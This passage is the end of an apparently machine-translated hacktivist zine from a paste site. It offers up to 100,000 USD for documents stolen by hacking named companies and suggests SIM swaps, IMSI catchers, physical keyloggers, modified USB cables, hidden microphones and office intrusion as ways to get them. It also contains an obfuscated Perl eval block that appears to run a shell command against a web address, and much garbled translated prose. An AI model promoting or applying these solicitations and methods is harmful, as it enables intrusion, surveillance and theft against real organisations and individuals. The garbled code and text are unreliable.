- objectives. Intelligence agencies can afford to have a team
- dedicated to the most advanced in fuzzing, a team working on development of
- exploits with a guy investigating exclusively the new techniques of
- mound manipulation, etc. We have neither the time nor the
- resources for that. The two most important skills for hacking
- Practical are phishing [12] and social engineering to gain access
- initial, and then be able to scale and move through the windows domains.
- [1] https://hausec.com/2019/08/12/offensive-lateral-movement/
- [2] https://www.exploit-db.com/papers/41914
- [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
- [4] https://www.trustedsec.com/blog/
- discovering-the-anti-virus-signature-and-bypassing-it /
- [5] https://www.tarlogic.com/en/blog/how-kerberos-works/
- [6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
- [7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
- [8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
- [9] https://adsecurity.org/
- [10] https://github.com/infosecn1nja/AD-Attack-Defense
- [11] https://github.com/jhaddix/tbhm
- [12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
- external-engagement-through-spear-phishing /
- - [12 - Recommended Reading] ------------------------------------------ ------
- __________________________________________
- / When the scientific level of a world \
- | far exceeds its level of solidarity, |
- \ that world destroys itself. /
- ------------------------------------------
- \ _. --- ._. .
- * \. ' '. *
- * _.- ~ =========== ~ -._
- . (___________________). *
- . ' \ _______ /. '
- . ' . '
- '
- - To me
- Almost all hacking today is done by black hat hackers, for your
- personal gain; or by white hat hackers, for the benefit of
- shareholders (and in defense of the banks, companies and states that are
- annihilating us and the planet we live in); and by military and
- intelligence agencies, as part of their war and conflict agenda. Seeing
- that this our world is already at the limit, I thought that, in addition to these
- technical tips to learn to hack, should include some resources that
- they have been very important for my development and have guided me in the use of my
- Hacking knowledge
- * Ami: The Child of the Stars - Enrique Barrios
- * Anarchy Works
- https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
- works
- * Living My Life - Emma Goldman
- * The Rise and Fall of Jeremy Hammond: Enemy of the State
- https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
- hammond-enemy-of-the-state-183599 /
- This guy and the HBGary hack were an inspiration
- * Days of War, Nights of Love - Crimethinc
- * Momo - Michael Ende
- * Letters to a young poet - Rilke
- * Dominion (Documentary)
- "We can't believe that if we don't look, what we don't want to see will not happen"
- - Tolstoy in Первая ступень
- * Bash Back!
- - [13 - Heal] ------------------------------------------- ---------------------
- The hacker world has a high incidence of depression, suicides and certain
- battles with mental health. I don't think it's because of hacking, but because of the
- kind of environment that hackers mostly come from. Like many
- hackers, I grew up with little human contact: I was a girl raised by the internet.
- I have my struggles with depression and emotional numbness. To Willie Sutton
- he is frequently quoted as saying that he robbed banks because "that's where he is
- the money ", but the quote is incorrect. What he really said was:
- Why did he rob banks? Because I enjoyed it. I loved to do it. I was more
- I live when I was inside a bank, in full robbery, that in any
- Another moment of my life. I enjoyed it so much that one or two weeks later
- I was already looking for the next opportunity. But for me money was a
- Minute, nothing more.
- Hacking has made me feel alive. It started as a way to self-medicate the
- depression. Later I realized that, in reality, I could serve to do
- something positive. I do not regret at all the way I grew up, brought several
- Beautiful experiences to my life. But I knew I could not continue to live on
- that way. So I started spending more time away from my computer, with
- other people, learning to open myself to the world, to feel my emotions, to
- connect with others, accept risks and be vulnerable. Much more
- difficult to hack, but at the mere hour the reward is more worth it. Yet
- it’s an effort, but even if it’s slow and wobbly, I feel that
- I am going on the right way.
- Hacking, done with conscience, can also be what heals us. According to
- Mayan wisdom, we have a gift given by nature, that we must
- understand to put it at the service of the community. In [1], it is explained:
- When a person does not accept his job or mission he begins to suffer
- diseases, apparently incurable; although he does not die shortly
- time, but only suffers, in order to wake up or drink
- awareness. That is why it is essential that a person who has acquired the
- knowledge and performs his work in the communities must pay his Toj and
- maintain constant communication with the Creator and his ruwäch q’ij, because
- He constantly needs the strength and energy of these. On the contrary,
- the diseases that made him react or take work could
- cause damage again.
- If you feel that hacking is fueling your isolation, depression, or others
- sufferings, breathe. Give yourself some time to meet and become aware. You
- You deserve to live happily, with health and fullness.
- ________________________
- <All Cows Are Beautiful>
- ------------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- ''
- [1] Ruxe’el mayab ’K’aslemäl: Root and spirit of Mayan knowledge
- https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
- - [14 - The Bug Hacktivist Program] ------------------------------
- It seems to me that hacking to get and filter documents of public interest is
- one of the best ways hackers can use their skills in
- benefit of society. Unfortunately for us hackers, as in almost
- All items, the perverse incentives of our economic system do not match
- with what benefits society. So this program is my attempt to
- make it possible for good hackers to earn a living honestly
- exposing material of public interest, instead of having to walk
- selling his work to the cybersecurity, cybercrime or
- cyber war Among some examples of companies whose leaks I would love to
- pay are the mining, timber and livestock companies that plunder our
- beautiful Latin America (and the defenders of land and territory are murdered
- that try to stop them), companies involved in attacks on Rojava as
- Havelsan, Baykar Makina, or Aselsan, surveillance companies such as the NSO group,
- war criminals and birds of prey such as Blackwater and Halliburton, companies
- private prisons such as GeoGroup and CoreCivic / CCA, and corporate lobbyists
- as ALEC. Pay attention when choosing where to investigate. For example, it is
- well known that oil companies are evil: they get rich at the cost of destroying
- the planet (and back in the 80s the companies themselves already knew about the
- consequences of its activity [1]). But if you hack them directly, you'll have
- to dive among an incredible amount of boring information about
- Your daily operations. Very likely it will be much easier
- find something interesting if instead you focus on your lobbyists [2]. Other
- way to select viable goals is by reading stories from journalists from
- research (like [3]), which are interesting but lack evidence
- solid. And that is exactly what your hacks can find.
- I will pay up to 100 thousand USD for each filtration of this type, according to the interest
- public and impact of the material, and the required labor in the hacking. Needless to say
- that a complete leak of internal documents and communications from
- one of these companies will be a benefit for the society that exceeds
- those one hundred thousand, but I'm not trying to enrich anyone. I just want to provide
- of sufficient funds so that hackers can earn a decent living
- doing a good job. Due to time constraints and considerations of
- security I will not open the material, nor inspect it for myself, but that
- I will read what the press says about it once it has been published, and I will make a
- public interest estimation from there. My contact information is
- at the end of the guide mentioned before [4].
- How you get the material is your thing. You can use traditional techniques
- of hacking outlined in this guide and the previous one [4]. Could you make a sim
- swap [5] to a corrupt businessman or politician, and then download his emails and
- backups from the cloud. You can order an IMSI catcher from alibaba and use it outside
- of its offices. You can do some war-driving (old or new
- [6]). You may be a person within your organizations that already has
- access. You can opt for a low-tech old-school style like in [7] and [8], and
- Simply sneak into their offices. Whatever works for you.
- [1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
- Sep / 19 / shell-and-exxons-secret-1980s-climate-change-warnings
- [2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
- [3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
- [4] https://www.exploit-db.com/papers/41914
- [5] https://www.vice.com/en_us/article/vbqax3/
- hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
- [6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
- is-my-keyboard /
- [7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
- [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
- ---- [14.1 - Partial payments] ---------------------------------------- ----------
- Are you a good-hearted waitress working in a company of evil [1]?
- Would you be willing to sneak a physical keylogger into the
- an executive's computer, to change its USB charging cable for a modified one
- [2], hide a mike in a meeting room where they plan their
- atrocities, or to leave one of these [3] forgotten in some corner of the
- Offices?
- [1] https://en.wikipedia.org/wiki/Evil_maid_attack
- [2] http://mg.lol/blog/defcon-2019/
- [3] https://shop.hak5.org/products/lan-turtle
- Are you good with social engineering and phishing, and did you get a shell in the
- an employee's computer, or there you got your vpn credentials
- using phishing? But maybe you couldn't get domain admin and download
- What you wanted?
- Did you participate in bug bounties programs and become an expert in
- web application hacking, but you don't have enough hacker experience
- to completely penetrate the company?
- Do you have facility with reverse engineering? Scan some evil companies
- to see which devices are exposed to the internet (firewall, vpn, and
- email gateways will be much more useful than things like cameras
- IP), apply reverse engineering and find some exploitable vulnerability
- remote form.
- If I can work with you to penetrate the company and get material
- of public interest, you will also be rewarded for your work. If not
- I have the time to work on it myself, at least I will try to advise you
- about how to continue until you can complete the hacking on your own.
- Support those in power to hack and monitor dissidents, activists and
- to the general population today is an industry of several billion
- of dollars, while hacking and exposing those in power is a
- voluntary and risky work. Turn it into a multi-million industry
- of dollars is certainly not going to fix that power imbalance, nor is it going to
- solve the problems of society. But I think it will be fun. So
- that ... I want to see people starting to collect their rewards!
- - [15 - Abolish prisons] ----------------------------------------- --------
- Built by the enemy to enclose ideas
- enclosing companions to silence war cries
- it is the center of torture and annihilation
- where the human being becomes more violent
- It is the reflection of society, repressive and prison
- sustained and based on authoritarian logic
- repressed and guarded custodians
- thousands of dams and prisoners are exterminated
- before this schizophrenic and ruthless machine
- companion Axel Osorio giving the strip in the cane
- breaking the isolation and silencing
- fire and war to jail, we are destroying!
- Rap Insurgent - Words In Conflict
- It would be typical to finish a zine hacker saying release hammond, release
- Manning, free hamza, free detainees for the assembly of дело Сети,
- etc. I will take this tradition to its most radical consequence [1], and say:
- The prisons must be abolished now! Being a criminal myself, they can
- To think that what happens is that I have a slightly skewed view of the matter.
- But seriously, it's not even a controversial issue, even the UN is
- practically agree [2]. So, once and for all, free people
- migrants [3] [4] [5] [6], often imprisoned by those same countries that created
- the war and the environmental and economic destruction from which they flee. Free
- all who are in prison for war against those who use drugs [7].
- Free all people imprisoned for war against the poor [8].
- Prisons all they do is hide and ignore the evidence of
- existence of social problems, instead of actually fixing them. Y
- until everyone is released, fight the prison system by remembering and
- keeping in mind those who are trapped in there. Send them honey,
- letters, helicopters [9], pirate radios [10] and books, and supports those who
- organized from there in [11] [12].
- [1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
- Davis-Are-obsolete-the-prisons-final.pdf
- [2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
- Promising_Practices_on_Alternatives_to_Imprisonment.pdf
- [3] https://www.theguardian.com/us-news/2016/dec/21/
- us-immigration-detention-center-christmas-santa-wish-list
- [4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
- images-tucson-arizona
- [5] https://www.playgroundmag.net/now/detras-Centros-Interizaje-Extranjeros-
- Spain_22648665.html
- [6] https://www.nytimes.com/2019/06/26/world/australia/
- australia-manus-suicide.html
- [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
- [8] VI, 2. i. The unpaid fine: https://scielo.conicyt.cl/scielo.php?script=
- sci_arttext & pid = S0718-00122012000100005
- [9] p. 10, Libel Nº2. Political bulletin from the High Security Prison
- [10] https://itsgoingdown.org/transmissions-hostile-territory/
- [11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
- [12] https://incarceratedworkers.org/
- - [16 - Conclusion] ------------------------------------------- ----------------
- Our world is upside down [1]. We have a justice system that
- Represents injustice. Law and order are there to create an illusion
- of social peace, and hide the systematic and deep exploitation, the
- violence, and injustice. Better follow your conscience, and not the law.
- [1] http://resistir.info/livros/galeano_patas_arriba.pdf
- Businessmen get rich by mistreating people and the planet,
- while care work is largely unpaid. Through the
- assault on everything communal, we have somehow raised cities densely
- populated, plagued by loneliness and isolation. The cultural system,
- political and economic in which we live encourages the worst facets of nature
- human: greed, selfishness and egocentrism, competitiveness, lack of
- compassion and attachment for authority. So, for whoever got
- remain sensitive and compassionate in a cold world, for all heroines
- everyday practices of goodness in small things, for all of you who
- they still have a burning star in their hearts: гоpи, гоpи ясно, чтобы не
- погасло!
- _____________________
- <Let's sing together! >
- ---------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- Open heart
- Open feeling
- Open understanding
- Leave reason aside
- And let the sun hidden inside you shine
- perl -Mre = eval << \ EOF
- ''
- = ~ (
- '(?'
- . '{'. (
- '' '|'% '
- ). ("\ [" ^
- '-'). ('' '|
- '!'). ("\` "|
- ','). '"(\\ $'
- . ': = `'. (('' ') |
- '#'). ('[' ^ '.').
- ('[' ^ ')'). ("\` "|
- ','). ('{' ^ '[') .'- '. (' ['^' ('). (' {'^' ['). (' '' | '('). ( '[' ^ '/'). ('[' ^ '/'). (
- '[' ^ '+'). ('[' ^ '('). ': //'. ('`' | '%'). ('`' | '.'). ('`' | ','). ('`' | '!'). (" \ `" |
- '#'). ('`' | '%'). ('[' ^ '!'). ('`' | '!'). ('[' ^ '+'). ('' '| '!'). ('[' ^ "\ /"). (
- '' '|') '). (' ['^' ('). (' ['^' / '). (' `'|'! ').'. '. ('` '|'% '). (' ['^'! ')
- . ('' '|', '). (' '' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('' '| "\ '").
- '.'. ('' '|' - '). (' ['^' # ').' / '. (' ['^' ('). (' '' | ('$')). (
- '[' ^ '('). ('`' | ',') .'- '. (' '' | '%'). ('[' ^ ('(')).
- '/ `) = ~'. ('[' ^ '('). '| </'. ('[' ^ '+'). '> | \\'
- . '\\'. ('`' | '.'). '|'. ('`' | "'").'; '.
- '\\ $: = ~'. ('[' ^ '('). '/ <. *?> //'
- . ('`' |" '").'; '. (' ['^' + '). (' ['^
- ')'). ('`' | ')'). ('`' | '.'). (('[') ^
- '/').('{'^'[').'\\$:=~/('.(('{')^
- '('). ('`' ^ '%'). ('{' ^ '#'). ('{' ^ '/')
- . ('' '^'! ').'. *? '. (' '' ^ '-'). ('' '|'% ')
- . ('[' ^ '#'). ("\` "| ')'). ('`' | '#'). (
- '' '|'! '). (' `'|'. '). ('` '|' / ')
- . '..) /'. ('[' ^ '('). '"})')
- ; $: = "\." ^ '~'; $ ~ = '@'
- | '('; $ ^ = ')' ^ '[';
- $ / = '' '|'. ';
- $, = '('
- EOF
- We were born at night.
- We live in it, we hack in it.
- Here we are, we are the rebel dignity,
- the forgotten heart of the Интернет.
- Our fight is for memory and justice,
- and the bad government is filled with criminals and murderers.
- Our fight is for fair and decent work,
- and bad government and corporations buy and sell zero days.
- For all tomorrow.
- For us the happy rebellion of the leaks
- and expropriation.
- For all everything.
- For us nothing.
- From the mountains of the Cyber Southeast,
- _ _ _ ____ _ _
- | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
- | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
- | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
- | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement